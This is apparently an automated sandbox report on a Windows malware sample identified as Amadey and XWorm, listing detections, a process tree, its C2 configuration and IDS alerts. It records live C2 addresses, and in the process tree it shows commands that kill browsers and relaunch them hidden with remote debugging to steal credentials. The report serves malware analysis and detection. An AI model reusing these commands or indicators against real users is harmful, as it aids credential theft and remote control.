Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1560508
MD5:	6aed281d1464e3a53839bbd9e7190535
SHA1:	8ea6e9ec2eb3970e0c361538fb6dbd074e5fa6c2
SHA256:	a20abe49e71912d860044fdf813c7fb90f32fde51097db4b689cac9c8f7a9ac9
Tags:	exeuser-Bitsight
Infos:

Detection

Amadey, XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Attempt to bypass Chrome Application-Bound Encryption

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Amadeys stealer DLL

Yara detected Telegram RAT

Yara detected XWorm

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found pyInstaller with non standard icon

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Query firmware table information (likely to detect VMs)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Uses the Telegram API (likely for C&C communication)

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Installs a global mouse hook

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Browser Started with Remote Debugging

Sigma detected: Execution of Suspicious File Type Extension

Spawns drivers

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses taskkill to terminate processes

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 4508 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 6AED281D1464E3A53839BBD9E7190535)

skotes.exe (PID: 5476 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 6AED281D1464E3A53839BBD9E7190535)

skotes.exe (PID: 6984 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 6AED281D1464E3A53839BBD9E7190535)

skotes.exe (PID: 4500 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 6AED281D1464E3A53839BBD9E7190535)

samat.exe (PID: 5228 cmdline: "C:\Users\user\AppData\Local\Temp\1008029001\samat.exe" MD5: F74588FC6A3342296CBB881D87C17300)

samat.exe (PID: 6120 cmdline: "C:\Users\user\AppData\Local\Temp\1008029001\samat.exe" MD5: F74588FC6A3342296CBB881D87C17300)

cmd.exe (PID: 1812 cmdline: C:\Windows\system32\cmd.exe /c "dxdiag /t C:\Users\user\AppData\Local\Bunny\Info.txt" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

dxdiag.exe (PID: 6196 cmdline: dxdiag /t C:\Users\user\AppData\Local\Bunny\Info.txt MD5: 19AB5AD061BF013EBD012D0682DF37E5)

taskkill.exe (PID: 6088 cmdline: taskkill /F /IM chrome.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

conhost.exe (PID: 5620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chrome.exe (PID: 2128 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 1100 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2008 --field-trial-handle=1964,i,6524152562037050844,4104416786767478461,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

taskkill.exe (PID: 2172 cmdline: taskkill /F /IM msedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

conhost.exe (PID: 5340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msedge.exe (PID: 3360 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 1468 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2088 --field-trial-handle=1992,i,15396176104267076459,4576140029387064159,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

taskkill.exe (PID: 8020 cmdline: taskkill /F /IM msedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

conhost.exe (PID: 8028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msedge.exe (PID: 8084 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 3960 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2060 --field-trial-handle=2044,i,10299215320425230575,4651246496313237729,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

taskkill.exe (PID: 6220 cmdline: taskkill /F /IM msedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

conhost.exe (PID: 572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msedge.exe (PID: 1252 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 4224 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1900 --field-trial-handle=1820,i,7547783680648845572,51913072553389247,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

taskkill.exe (PID: 7348 cmdline: taskkill /F /IM msedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

conhost.exe (PID: 7472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msedge.exe (PID: 5168 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7356 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1992 --field-trial-handle=1984,i,13849923393269030122,6960310804162820748,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

taskkill.exe (PID: 2980 cmdline: taskkill /F /IM msedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

conhost.exe (PID: 3124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msedge.exe (PID: 4484 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7524 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1976 --field-trial-handle=2008,i,9308063002193397324,7617717190082231844,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

taskkill.exe (PID: 6548 cmdline: taskkill /F /IM msedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

conhost.exe (PID: 5660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msedge.exe (PID: 1224 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 6200 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2000 --field-trial-handle=1952,i,12058209678058939183,18292394788327998735,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

taskkill.exe (PID: 5268 cmdline: taskkill /F /IM msedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

conhost.exe (PID: 3992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msedge.exe (PID: 8092 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8148 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2028 --field-trial-handle=2072,i,10086388543525150853,10806765783338913664,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

taskkill.exe (PID: 4800 cmdline: taskkill /F /IM msedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

conhost.exe (PID: 7084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msedge.exe (PID: 7492 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox MD5: 69222B8101B0601CC6663F8381E7E00F)

mstee.sys (PID: 4 cmdline: MD5: 244C73253E165582DDC43AF4467D23DF)

mskssrv.sys (PID: 4 cmdline: MD5: 26854C1F5500455757BC00365CEF9483)

svchost.exe (PID: 6628 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

msedge.exe (PID: 2516 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 4408 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1824 --field-trial-handle=2088,i,16928911371051510587,15929168129410231478,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7744 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --no-sandbox --mojo-platform-channel-handle=5212 --field-trial-handle=2088,i,16928911371051510587,15929168129410231478,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7760 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --no-sandbox --onnx-enabled-for-ee --mojo-platform-channel-handle=5288 --field-trial-handle=2088,i,16928911371051510587,15929168129410231478,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

svchost.exe (PID: 3952 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

msedge.exe (PID: 8064 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7164 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2028 --field-trial-handle=1944,i,16409252098928237948,2804454962869156604,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7556 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 4408 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1796 --field-trial-handle=1976,i,7400251867187163904,16596075297624197194,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x1e48038:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1e480d5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1e481ea:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x1e4768a:$cnc4: POST / HTTP/1.1
sslproxydump.pcap	JoeSecurity_XWorm_1	Yara detected XWorm	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000003.00000002.2152067719.00000000007A1000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000002.2104456781.00000000006C1000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000003.2063442890.0000000005110000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000002.00000002.2148194212.00000000007A1000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000006.00000003.2662182646.0000000004F80000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000003.00000003.2111686046.0000000004B80000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000002.00000003.2104419686.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Process Memory Space: samat.exe PID: 6120	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author
2.2.skotes.exe.7a0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.2.file.exe.6c0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
3.2.skotes.exe.7a0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security

Sigma Signatures

System Summary

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox, CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox, CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1008029001\samat.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe, ParentProcessId: 6120, ParentProcessName: samat.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox, ProcessId: 2128, ProcessName: chrome.exe

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\mstee.sys, NewProcessName: C:\Windows\System32\drivers\mstee.sys, OriginalFileName: C:\Windows\System32\drivers\mstee.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: mstee.sys

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6628, ProcessName: svchost.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-21T22:15:48.704936+0100	2028371	3	Unknown Traffic	192.168.2.5	50337	20.189.173.5	443	TCP

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-21T22:12:37.303034+0100	2044696	1	A Network Trojan was detected	192.168.2.5	49880	185.215.113.43	80	TCP
2024-11-21T22:18:37.261656+0100	2044696	1	A Network Trojan was detected	192.168.2.5	50148	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-21T22:12:06.429773+0100	2856147	1	A Network Trojan was detected	192.168.2.5	49812	185.215.113.43	80	TCP
2024-11-21T22:17:33.115436+0100	2856147	1	A Network Trojan was detected	192.168.2.5	50124	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-21T22:12:35.903759+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.5	49818	TCP
2024-11-21T22:18:35.866719+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.5	50146	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-21T22:12:12.018423+0100	2803305	3	Unknown Traffic	192.168.2.5	49824	188.165.52.14	443	TCP
2024-11-21T22:18:33.139564+0100	2803305	3	Unknown Traffic	192.168.2.5	50147	31.41.244.11	80	TCP

ETPRO MALWARE Win32/XWorm Checkin via Telegram

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-21T22:18:48.253731+0100	2853685	1	A Network Trojan was detected	192.168.2.5	50152	149.154.167.220	443	TCP

ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-21T22:18:57.523762+0100	2852870	1	Malware Command and Control Activity Detected	87.120.112.33	8398	192.168.2.5	50155	TCP
2024-11-21T22:19:02.521650+0100	2852870	1	Malware Command and Control Activity Detected	87.120.112.33	8398	192.168.2.5	50155	TCP
2024-11-21T22:19:05.664794+0100	2852870	1	Malware Command and Control Activity Detected	87.120.112.33	8398	192.168.2.5	50155	TCP
2024-11-21T22:19:07.533863+0100	2852870	1	Malware Command and Control Activity Detected	87.120.112.33	8398	192.168.2.5	50155	TCP
2024-11-21T22:19:12.557719+0100	2852870	1	Malware Command and Control Activity Detected	87.120.112.33	8398	192.168.2.5	50155	TCP
2024-11-21T22:19:17.556558+0100	2852870	1	Malware Command and Control Activity Detected	87.120.112.33	8398	192.168.2.5	50155	TCP
2024-11-21T22:19:18.544558+0100	2852870	1	Malware Command and Control Activity Detected	87.120.112.33	8398	192.168.2.5	50155	TCP
2024-11-21T22:19:19.107631+0100	2852870	1	Malware Command and Control Activity Detected	87.120.112.33	8398	192.168.2.5	50155	TCP
2024-11-21T22:19:22.562733+0100	2852870	1	Malware Command and Control Activity Detected	87.120.112.33	8398	192.168.2.5	50155	TCP
2024-11-21T22:19:28.058952+0100	2852870	1	Malware Command and Control Activity Detected	87.120.112.33	8398	192.168.2.5	50155	TCP
2024-11-21T22:19:31.595832+0100	2852870	1	Malware Command and Control Activity Detected	87.120.112.33	8398	192.168.2.5	50155	TCP
2024-11-21T22:19:32.591445+0100	2852870	1	Malware Command and Control Activity Detected	87.120.112.33	8398	192.168.2.5	50155	TCP
2024-11-21T22:19:37.572545+0100	2852870	1	Malware Command and Control Activity Detected	87.120.112.33	8398	192.168.2.5	50155	TCP
2024-11-21T22:19:42.573533+0100	2852870	1	Malware Command and Control Activity Detected	87.120.112.33	8398	192.168.2.5	50155	TCP
2024-11-21T22:19:44.325519+0100	2852870	1	Malware Command and Control Activity Detected	87.120.112.33	8398	192.168.2.5	50155	TCP
2024-11-21T22:19:47.583027+0100	2852870	1	Malware Command and Control Activity Detected	87.120.112.33	8398	192.168.2.5	50155	TCP
2024-11-21T22:19:49.281235+0100	2852870	1	Malware Command and Control Activity Detected	87.120.112.33	8398	192.168.2.5	50155	TCP
2024-11-21T22:19:52.583310+0100	2852870	1	Malware Command and Control Activity Detected	87.120.112.33	8398	192.168.2.5	50155	TCP
2024-11-21T22:19:57.216603+0100	2852870	1	Malware Command and Control Activity Detected	87.120.112.33	8398	192.168.2.5	50155	TCP
2024-11-21T22:19:57.591256+0100	2852870	1	Malware Command and Control Activity Detected	87.120.112.33	8398	192.168.2.5	50155	TCP
2024-11-21T22:20:02.599360+0100	2852870	1	Malware Command and Control Activity Detected	87.120.112.33	8398	192.168.2.5	50155	TCP
2024-11-21T22:20:07.603262+0100	2852870	1	Malware Command and Control Activity Detected	87.120.112.33	8398	192.168.2.5	50155	TCP
2024-11-21T22:20:10.186673+0100	2852870	1	Malware Command and Control Activity Detected	87.120.112.33	8398	192.168.2.5	50155	TCP
2024-11-21T22:20:11.193125+0100	2852870	1	Malware Command and Control Activity Detected	87.120.112.33	8398	192.168.2.5	50179	TCP
2024-11-21T22:20:12.593833+0100	2852870	1	Malware Command and Control Activity Detected	87.120.112.33	8398	192.168.2.5	50155	TCP
2024-11-21T22:20:18.111294+0100	2852870	1	Malware Command and Control Activity Detected	87.120.112.33	8398	192.168.2.5	50155	TCP

ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-21T22:19:05.665706+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50155	87.120.112.33	8398	TCP
2024-11-21T22:19:18.545627+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50155	87.120.112.33	8398	TCP
2024-11-21T22:19:31.596692+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50155	87.120.112.33	8398	TCP
2024-11-21T22:19:44.327464+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50155	87.120.112.33	8398	TCP
2024-11-21T22:19:57.223703+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50155	87.120.112.33	8398	TCP
2024-11-21T22:20:10.187579+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50155	87.120.112.33	8398	TCP

ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-21T22:19:19.107631+0100	2858924	1	Malware Command and Control Activity Detected	87.120.112.33	8398	192.168.2.5	50155	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

